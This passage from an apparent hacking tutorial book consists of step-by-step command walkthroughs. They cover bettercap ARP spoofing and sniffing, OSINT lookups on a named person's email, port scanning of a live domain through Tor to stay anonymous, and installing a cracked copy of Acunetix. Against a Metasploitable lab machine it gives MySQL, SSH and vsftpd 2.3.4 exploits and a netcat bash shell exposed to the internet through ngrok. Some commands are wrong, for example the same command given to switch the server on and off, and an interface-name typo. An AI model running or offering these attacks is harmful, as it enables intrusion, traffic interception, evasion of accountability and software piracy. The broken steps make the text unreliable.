Command: net.probe on

7: Check discovers hosts.

Command: net.show

8: Https server help.

Command: help https.server

9: Modules.
339
 340

10: Https Server Parameter.

Command: set https.server.path
/var/www/html

11: Show Parameter.

Command: get https.server.path

12: On Https Server.

Command: https.server on

13: Open Link in the browser.

Command: https://192.168.43.111:443
 341

14: Off Https Server.

Command: https.server on

15: Arp Spoof help.

Command: help arp.spoof

16: Set Arp Spoof Parameter.

Command: set arp.spoof.fullduplex true

17: Show Targets.

Command: net.show

18: Set Targets.

 342

Command: set arp.spoof.targets

192.168.43.111

19: On Arp Spoof.

Command: arp.spoof on

20: Check Arp Spoof.

Command: arp -a

21: On Net Sniff.

Command: net.sniff on

22: Stop Net Sniff.

Command: net.sniff off

23: Stop Arp Spoof.

 343

Command: arp.spoof off

24: Wifi Module help.

Command: help wifi

25: Enable Wifi Monitor Mode.

Command: sudo airmon-ng start wlna0

26: Set Wifi interface.

Command: set wifi.interface wlan0mon

27: Open Wifi recon module.

Command: wifi.recon on

28: Check to monitor wifi lists.

Command: wifi.show
 344

29: Update caplets.

Command: caplets.update

30: Check caplets lists.

Command: caplets.show

31: Download UI.

Command: ui.update

32: Exit.
Command: exit

33: Changes in caplets.

Command: sudo nano
/usr/local/share/bettercap/caplets/https-ui.cap
 345

How to investigate an Email ID

1: Install Mosint.
Command: git clone
https://github.com/alpkeskin/mosint.git

2: Go to the Mosint directory.

Command: cd mosint

3: Install basic requirements.

Command: pip3 install -r requirements.txt

4: Check the go version.

Command: go version

5: Install go language.
 346

Command: sudo apt install golang

6: Check help.
Command: go run main.go -h

7: Check temporary e-mail.

Command: go run main.go -e
walikhankakar313@gmail.com -verify

8: Set API key.

Command: nano keys.json

9: Check Gmail which is used in social media

accounts.
Command: go run main.go -e
walikhankakar313@gmail.com -social
 347

10: Check Gmail used in the website or domain.

Command: go run main.go -e
walikhankakar313@gmail.com -relateds

11: Gmail leaks.

Command: go run main.go -e
walikhankakar313@gmail.com -leaks

12: Find Gmail which is used in the domain

name.
Command: go run main.go -e
walikhankakar313@gmail.com -domain

13: Save Gmail information in a file.

Command: go run main.go -e
walikhankakar313@gmail.com -all -o
kakarstore.txt
348
 349

Netcat | Swiss army knife of hacking tools

1: Netcat help.
Command: nc -h
Command: netcat -h

2: Check Windows IP Address in Windows

PowerShell.
Command: ipconfig

3: Check windows system Ports.

Command: nc -nvz 192.168.43.234 1-100
Command: nc -nvz 192.168.43.234 1-3000

4: Connect with Ports.

Command: nc -nv 192.168.43.234 21
 350

Master of hacker tool to perfect scan any

website | Masscan

1: Open Masscan.

2: Go to Information Gathering Live Host

identification Masscan.

3: Find the website IP Address.

Command: ping kakarstore.com
 351

4: Scan website Ports.

Command: masscan 185.151.30.175 -p 80
Command: masscan 185.151.30.175 -p 1000-
1500
 352

Mobile Security Framework

1: Install python3.
Command: apt install python3
Command: apt install python3-venv

2: Install MobSF.
Command: git clone
https://github.com/MobSF/Mobile-Security-
Framework-MobSF.git

3: Go to the MobSF directory.

Command: cd Mobile-Security-Framework-
MobSF

4: Check or install MobSF packages.

Command: ./setup.sh
 353

5: Run MobSF.
Command: ./run.sh 127.0.0.1:8000

6: Open the browser and paste this link into it.

Command: http://localhost:8000/

7: Upload files and analyze files.

 354

How hackers

1: Install Maryam Framework.

Command: apt install maryam

2: Start Maryam.
Command: maryam

3: Check help.
Command: help

4: Check workspaces.
Command: show workspaces
Command: workspaces

5: Add workspaces.
 355

Command: workspaces add kakarstore

6: Show options.
Command: show options

7: Increase timeout.
Command: set timeout 15

8: Check Modules.
Command: show modules

9: How to use DNS brute.

Command: dnsbrute

10: Find the domain.

Command: dnsbrute -d kakarstore.com -t 50
 356

11: Check Crawl_pages.

Command: crawl_pages

11: Find hidden pages.

Command: crawl_pages -d kakarstore.com -r
"https?://[A-z0-9\./]+"

12: Check searx.

Command: searx -q kakarstore -l 10

13: Check quora.

Command: quora -q kakarstore -l 10

14: Check Instagram Module.

Command: Instagram
 357

15: Check user name search.

Command: username_search

16: Search user name.

Command: username_search -q kakarstore -t
100

17: Check docs_search.

Command: docs_search

18: Find docs_search.

Command: docs_search -q hacker -f pdf -e
google,bing,yandex,yahoo,duckduckgo -t 100

19: Use tweet_search.

Command: tweet_search -q kakarstore
 358

20: Save Modules output.

Command: docs_search -q hacker -f pdf -e
google,bing,Yandex, yahoo,duckduckgo -t 100
output

21: Check report.

Command: report

22: Generate output.

Command: report txt kakarstore_pdf
osint/docs_search

23: Open a new terminal and check Access save

txt, xml, pdf file.
Command: cat
.maryam/workspaces/kakarstore/kakarstore_pd
f.txt
 359

24: Save search user name output.

Command: report kakarstore username
osint/username.kakarstore
 360

Easily expose your localhost services to

the internet

1: Start the apache2 server.

Command: service apache2 start

2: Open the localhost website in the browser.

Command: localhost

3: Forward localhost.
Website: http://localhost.run/

4: Generate ssh-keygen.
Command: ssh-keygen

5: Enter, Enter, Enter make it default.

 361

6: Run localhost.
Command: ssh -R 80:localhost:80 localhost.run
Command: yes
Command: enter

7: Open localhost everywhere.

Website: https://04f2ceb5f03622.lhr.life
 362

Stay Anonymous online like a pro

1: Install proxy chains and tor.

Command: apt install proxychains tor

2: Proxychains configuration sitting.

Command: nano /etc/proxychains4.conf

3: Start tor service.

Command: sudo service tor start

4: Check tor service status.

Command: sudo service tor status

5: Open proxy chains (not open in root).

Command: proxychains firefox
 363

6: Scan the website anonymously.

Command: proxychains sudo nmap -sS
kakarstore.com
 364

How do Hackers Hack Websites? - Acunetix

Pro Tool

1: Download the Acunetix zip file.

Website:
https://gist.github.com/Ademking/fbc6977b555
d930224b291bb26e44f2e

2: Extract the Acunetix zip file manually.

 365

3: Open Acunetix and extract the zip file.

4: Open Terminal in the Acunetix extract folder.

5: Give root permissions.

Command: sudo su

6: Checklists.
 366

Command: ls

6: Give execute permissions.

Command: chmod +x
acunetix_13.0.200217097_x64_.sh

7: Check executable permissions of

acunetix_13.0.200217097_x64_.sh
Command: ls -l

8: Execute Acunetix.
 367

Command: ./acunetix_13.0.200217097_x64_.sh

9: Enter to continue.

10: Accept the license.

Command: yes

11: Create a new host name if you want.

Command: write host name (kakarstore)

12: Use your Gmail.

13: Create a password.

14: Follow these commands.

 368

Command: cp Crack/wvsc
/home/acunetix/.acunetix/v_200217097/scanne
r/
Command: cp Crack/license_info.json
/home/acunetix/.acunetix/data/license/
Command: systemctl start acunetix.service

15: Please visit https://kakar:109/ to access

Acunetix UI Open this link in the browser
https://kakar:109/.

16: Change host name.

Command: nano /etc/hosts

17: Save and change the host name.

Command: ctrl + s
369
 370

BIOS or Aborted error

1: BIOS or Aborted error.

2: Shut down Pc.

3: F-10

4: Go to Security

5: Go to Virtualization Technology

6: Enable
 371

Twitter OSINT (Open Source

Investigation)

1: Clone Twitter Intelligence Tool.

Command: git clone
https://github.com/twintproject/twint.git

2: Go to the Twitter Intelligence Tool folder.

Command: cd twint

3: Install Twitter Intelligence Tool requirements.

Command: pip3 install -r requirements.txt

4: Install Pip.
Command: pip3 install twint
 372

Command: pip3 install --user --upgrade

git+https://github.com/twintproject/twint.git@
origin/master#egg=twint

5: Install Pipenv.
Command: pipenv install
git+https://github.com/twintproject/twint.git#e
gg=twint
Command: apt-get install pipenv

6: Check twint requirements lists.

Command: cat requirements.txt
 373

Breaking SERVER Systems using

MySQL

1: Scan MySQL port.

Command: nmap -p 3306 192.168.43.126 -v -sV
--script=mysql*

2: Use Metasploitable2 Machine for MySQL

testing.

3: Here we found MySQL port 3306 which is

open.
 374

4: We found two accounts that don't have

passwords.

3: Connect to the victim MySQL.

Command: mysql -h 192.168.43.126 -u root

4: Show Databases.
Command: SHOW DATABASES;
 375

5: Connect to the Database.

Command: connect dvwa;

6: Show tables.
Command: SHOW TABLES;
 376

7: Exit terminal.
Command: exit

8: Open msfconsole.
Command: msfconsole

9: Search MySQL.
Command: search mysql

10: Exploit Auxiliary.

11: Copy Auxiliary.

Ex: auxiliary/scanner/mysql/mysql_login
 377

12: Test Auxiliary.

Command: use
auxiliary/scanner/mysql/mysql_login

13: Show options of Auxiliary.

Command: show options

14: Set RHOSTS.

Command: set RHOSTS 192.168.43.162

15: Run.
Command: run

16: Open Exploit-DB website.

Website: https://www.exploit-db.com/
 378

Cmatrix

1: Install Cmatrix.
Command: cmatrix

2: Run Cmatrix.
Command: cmatrix
 379

Show Neofetch on Kali Linux Terminal

1: Add Neofetch in zshrc.

Command: gedit .zshrc

2: Install lolcat.
Command: apt-get install lolcat

3: Scroll down.

4: Add neofetch name.

Command: neofetch | lolcat
 380

5: Terminal new look.

 381

How Hackers Exploit SSH to Hack Your

System? | System Hacking using SSH

1: Scan Victim IP.

Command: nmap 192.168.43.126 -p 1-65535 -v
-sS -sV -sC

2: Check SSH Port.

3: SSH Port is open.

4: SSH enumeration.
 382

Command: nmap 192.168.43.126 -p 22 -v -sS -

sV --script=*

5: SSH default credentials.

6: Connect Netcat to credentials.

Command: nc -v 192.168.43.126 22

7: Start msfconsole.
Command: msfconsole

8: Search SSH.
 383

Command: search ssh

9: Find auxiliary/scanner/ssh/ssh_login.

10: Use auxiliary/scanner/ssh/ssh_login.

Command: use auxiliary/scanner/ssh/ssh_login

11: Show options.

Command: show options
 384

12: Set victim IP in RHOSTS.

Command: set RHOSTS 192.168.43.126

13: Set username.

Command: set USERNAME user

14: Set password.

Command: set PASSWORD user

15: Run now.

Command: run

16: Access to sessions.

Command: sessions
 385

17: Connect to sessions.

Command: sessions -i 1

18: Access now.

19: Checklists.
Command: ls

20: Access Shell.

Command: shell

21: Search sshex.

 386

Command: search sshex

22: Use exploit/multi/ssh/sshexec.

Command: use exploit/multi/ssh/sshexec

23: Show options.

Command: show options

24: Set PASSWORD.

Command: set PASSWORD user

25: Set USERNAME.

Command: set USERNAME user

26: Set RHOSTS.

 387

Command: set RHOSTS 192.168.43.126

27: Show options.

Command: show options

28: Run.
Command: run

29: Check system files.

Command: ls
 388

How Hackers Remotely Hack Any Device

using FTP

1: Discover your active IP Addresses

which are working.
Command: netdiscover

2: Scan IP in Nmap.
Command: nmap 192.168.43.126 -v -sT -sV -p 1-
65535 -O

3: FTP enumeration.
Command: nmap 192.168.43.126 -v -sT -sV -p
21 --script=ftp*
 389

4: Try to login by the help of Netcat.

Command: nc -v 192.168.43.126 21

5: Login default User name and Password.

Command: USER anonymous
Command: PASS anonymous

6: Login is successful.

7: Check the help.

 390

Command: help

8: Try to login by the default user name.

Command: nc -v 192.168.43.126 21
Command: USER user
Command: USER user
Command: PASS user

9: Check vulnerabilities from Exploit

Database.
 391

Website: https://www.exploit-db.com/

10: Download vsftpd 2.3.4 vulnerability file.

Website: https://www.exploit-
db.com/exploits/49757

11: Go to Downloads directory.

Command: cd Downloads

12: Exploit vsftpd 2.3.4 file.

 392

Command: python3 49757.py 192.168.43.126

13: Check the lists of exploitable system.

Command: ls

14: Check exploitable system IP.

Command: ifconfig

15: Reboot exploitable sytem anonymously.

Command: reboot
 393

Hack Systems: How to use Netcat

Commands with Examples?

1: Connect to the server.

Command: nc -nlvp 7878

2: Open the metasploitable2 machine.

3: Connect the Kali Linux IP in the

metasploitable2 machine.
Command: nc -nv 192.168.43.36 7878

4: Write some thing in the metasploitable2

machine.
 394

Example: Hi! How are you?

5: Go to the Kali Linux terminal check the

message.

6: Share the terminal.

Command: nc -nvlp 7878 -e /bin/bash

7: Go the metasploitable2 machine connect it

again.
Command: nc -nv 192.168.43.36 7878
 395

8: Execute the system in the metasploitable2

machine.

9: Check the lists in the metasploitable2

machine.
Command: ls

10: Go to the Downloads directory in the

metasploitable2 machine.
Command: cd Downloads

11: Check the Downloads directory lists in the

metasploitable2 machine.
Command: ls

12: Here is the victim machine is the

metasploitable2 machine.
 396

13: Run the Ngrok.

Command: ./ngrok tcp 7878

14: Start the Netcat.

Command: nc -nlvp 7878 -e /bin/bash

15: Go to the metasploitable2 machine.

16: Find the port of Ngrok.io IP in the

metasploitable2 machine.
Command: ping 0.tcp.ap.ngrok.io
 397

17: Open Netcat command.

Command: nc -nv 13.229.3.203 10978
19: 10978 is the port of Ngrok.

20: Check the lists in the metasploitable2

machine.
Command: ls